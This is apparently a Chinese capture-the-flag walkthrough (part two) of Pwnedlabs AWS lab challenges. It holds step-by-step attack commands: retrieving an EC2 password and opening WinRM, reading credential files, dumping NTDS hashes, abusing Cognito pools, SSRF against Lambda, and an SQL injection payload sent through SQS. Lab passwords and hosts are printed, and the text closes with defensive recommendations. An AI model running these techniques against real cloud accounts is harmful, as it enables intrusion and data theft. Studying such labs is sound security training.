Pwnedlabs靶场Writeup(下) - AWS云安全渗透实战指南<\/h1>

10. 利用不安全的存储和备份获利<\/h2>

初始信息收集<\/h3>
aws sts get-caller-identity
<\/span><\/span>aws iam list-attached-user-policies --user-name contractor
<\/span><\/span>aws iam get-policy --policy-arn arn:aws:iam::427648302155:policy\/Policy
<\/span><\/span>aws iam get-policy-version --policy-arn arn:aws:iam::427648302155:policy\/Policy --version-id v4
<\/span><\/span><\/code><\/pre>关键发现<\/h3>

用户具有ec2:GetPasswordData<\/code>权限，可获取特定实例的密码数据<\/li>
通过S3存储桶策略发现可访问ssh_keys_backup.zip<\/code><\/li>
<\/ul>
利用步骤<\/h3>

获取EC2实例密码数据：<\/li>
<\/ol>
aws ec2 get-password-data --instance-id i-04cc1c2c7ec1af1b5
<\/span><\/span>aws ec2 get-password-data --priv-launch-key it-admin.pem --instance-id i-04cc1c2c7ec1af1b5
<\/span><\/span><\/code><\/pre>
使用获取的凭证通过WinRM连接Windows实例：<\/li>
<\/ol>
$password = convertto-securestring -AsPlainText -Force -String 'UZ$abRnO!bPj@KQk%BSEaB*IO%reJIX!'<\/span>
<\/span><\/span>$credential = new-object -typename System.Management.Automation.PSCredential -argumentlist "Administrator"<\/span>,$password
<\/span><\/span>Enter-PSSession -ComputerName 44.204.191.38 -Credential $credential
<\/span><\/span><\/code><\/pre>
在实例中发现AWS凭证：<\/li>
<\/ol>
Get-Content c:\users\admin\.aws\credentials
<\/span><\/span><\/code><\/pre>
使用新凭证获取flag：<\/li>
<\/ol>
aws s3 cp s3:\/\/hl-it-admin\/flag.txt .\/
<\/span><\/span><\/code><\/pre>深入利用<\/h3>

发现备份的NTDS.dit和SYSTEM文件，可用于提取域密码哈希：<\/li>
<\/ul>
python3.10 secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL -outputfile out.txt
<\/span><\/span><\/code><\/pre>11. 在CodeCommit和Docker中发现秘密<\/h2>
初始发现<\/h3>

在Docker镜像层中发现AWS凭证<\/li>
使用凭证枚举IAM权限发现CodeCommit访问权限<\/li>
<\/ul>
利用步骤<\/h3>

列出CodeCommit仓库：<\/li>
<\/ol>
aws codecommit list-repositories
<\/span><\/span><\/code><\/pre>
检查仓库分支和提交：<\/li>
<\/ol>
aws codecommit list-branches --repository-name vessel-tracking
<\/span><\/span>aws codecommit get-commit --repository-name vessel-tracking --commit-id b63f0756ce162a3928c4470681cf18dd2e4e2d5a
<\/span><\/span><\/code><\/pre>
获取敏感文件内容：<\/li>
<\/ol>
aws codecommit get-file --repository-name vessel-tracking --commit-specifier b63f0756ce162a3928c4470681cf18dd2e4e2d5a --file-path js\/server.js
<\/span><\/span><\/code><\/pre>
从解码的JS文件中提取AWS凭证并获取flag<\/li>
<\/ol>
12. S3存储桶暴力破解<\/h2>
技术要点<\/h3>

通过静态文件分析发现S3命名模式：hlogistics-xx<\/code><\/li>
使用ffuf工具进行子域名爆破：<\/li>
<\/ul>
ffuf -u https:\/\/hlogistics-FUZZ.s3.amazonaws.com\/ -w wordlist.txt
<\/span><\/span><\/code><\/pre>利用步骤<\/h3>

发现beta存储桶中的Python文件包含AWS凭证<\/li>
使用凭证访问SSM参数存储：<\/li>
<\/ol>
aws ssm get-parameter --name lharris
<\/span><\/span><\/code><\/pre>
枚举Lambda函数并调用获取敏感数据：<\/li>
<\/ol>
aws lambda list-functions
<\/span><\/span>aws lambda invoke --function-name crew_administration_data output.txt
<\/span><\/span><\/code><\/pre>13. 滥用Cognito用户和身份池<\/h2>
Cognito攻击流程<\/h3>

匿名获取身份池凭证：<\/li>
<\/ol>
aws cognito-identity get-id --identity-pool-id us-east-1:d2fecd68-ab89-48ae-b70f-44de60381367
<\/span><\/span>aws cognito-identity get-credentials-for-identity --identity-id <identity-id>
<\/span><\/span><\/code><\/pre>
注册用户池账户：<\/li>
<\/ol>
aws cognito-idp sign-up --client-id 16f1g98bfuj9i0g3f8be36kkrl --username feng1 --password "FENGfeng123@@@"<\/span> --user-attributes Name=<\/span>"email"<\/span>,Value=<\/span>"email@gmail.com"<\/span>
<\/span><\/span>aws cognito-idp confirm-sign-up --client-id 16f1g98bfuj9i0g3f8be36kkrl --username feng1 --confirmation-code 497147<\/span>
<\/span><\/span><\/code><\/pre>
获取认证令牌：<\/li>
<\/ol>
aws cognito-idp initiate-auth --auth-flow USER_PASSWORD_AUTH --client-id 16f1g98bfuj9i0g3f8be36kkrl --auth-parameters USERNAME=<\/span>feng1,PASSWORD=<\/span>FENGfeng123@@@
<\/span><\/span><\/code><\/pre>
使用IdToken获取特权凭证：<\/li>
<\/ol>
aws cognito-identity get-id --identity-pool-id us-east-1:d2fecd68-ab89-48ae-b70f-44de60381367 --logins "cognito-idp.us-east-1.amazonaws.com\/us-east-1_8rcK7abtz=<IdToken>"<\/span>
<\/span><\/span><\/code><\/pre>
利用Lambda SSRF漏洞获取环境变量中的凭证：<\/li>
<\/ol>
aws lambda invoke --function-name huge-logistics-status --payload 'eyJ0YXJnZXQiOiJodHRwczovL3d3dy5iYWlkdS5jb20ifQ=='<\/span> output2.txt
<\/span><\/span><\/code><\/pre>14. 利用泄露的凭证<\/h2>
攻击路径<\/h3>

从.env文件发现数据库凭证和部分AWS凭证<\/li>
尝试使用相同凭证登录AWS控制台成功<\/li>
在Secrets Manager中发现数据库连接信息：<\/li>
<\/ol>
{
<\/span><\/span>  "username"<\/span>: "reports"<\/span>, 
<\/span><\/span>  "password"<\/span>: "fw=T(HWf5;{d`U.PK)19*lC_qhkJ}iD="<\/span>,
<\/span><\/span>  "host"<\/span>: "employees.cwqkzlyzmm5z.us-east-1.rds.amazonaws.com"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
连接数据库获取flag：<\/li>
<\/ol>
mysql -u reports -p -h employees.cwqkzlyzmm5z.us-east-1.rds.amazonaws.com
<\/span><\/span><\/code><\/pre>15. 利用S3版本控制访问秘密<\/h2>
关键步骤<\/h3>

发现S3版本控制启用：<\/li>
<\/ol>
curl -I https:\/\/huge-logistics-dashboard.s3.eu-north-1.amazonaws.com\/static\/js\/auth.js
<\/span><\/span><\/code><\/pre>
列出对象版本：<\/li>
<\/ol>
aws s3api list-object-versions --bucket huge-logistics-dashboard
<\/span><\/span><\/code><\/pre>
获取旧版本文件：<\/li>
<\/ol>
aws s3api get-object --bucket huge-logistics-dashboard --key static\/js\/auth.js --version-id qgWpDiIwY05TGdUvTnGJSH49frH_7.yh auth.js
<\/span><\/span>aws s3api get-object --bucket huge-logistics-dashboard --key "private\/Business Health - Board Meeting (Confidential).xlsx"<\/span> --version-id HPnPmnGr_j6Prhg2K9X2Y.OcXxlO1xm8 1.xlsx
<\/span><\/span><\/code><\/pre>18. SQS和Lambda SQL注入<\/h2>
攻击流程<\/h3>

枚举可用资源：<\/li>
<\/ol>
aws sqs list-queues
<\/span><\/span>aws lambda list-functions
<\/span><\/span><\/code><\/pre>
发送恶意消息到SQS队列：<\/li>
<\/ol>
aws sqs send-message --queue-url https:\/\/sqs.eu-north-1.amazonaws.com\/254859366442\/huge-analytics --message-attributes '{ "Weight": { "StringValue": "1337", "DataType":"Number"}, "Client": {"StringValue":"EY\" union select 1,clientName,address,cardUsed from customerData-- -", "DataType": "String"}, "trackingID": {"StringValue":"HLT1337", "DataType":"String"}}'<\/span> --message-body "feng"<\/span>
<\/span><\/span><\/code><\/pre>
触发Lambda执行SQL注入：<\/li>
<\/ol>
aws lambda invoke --function-name huge-logistics-stock --payload 'eyJERVNDIjoiSExUMTMzNyJ9'<\/span> output
<\/span><\/span><\/code><\/pre>防御建议<\/h2>

身份池不应支持未经认证的身份获取凭证<\/li>
用户池应限制开放注册<\/li>
加强S3存储桶策略，避免过度权限<\/li>
实施最小权限原则<\/li>
定期轮换凭证<\/li>
对用户输入进行严格验证和过滤<\/li>
启用S3版本控制时要谨慎管理权限<\/li>
<\/ol>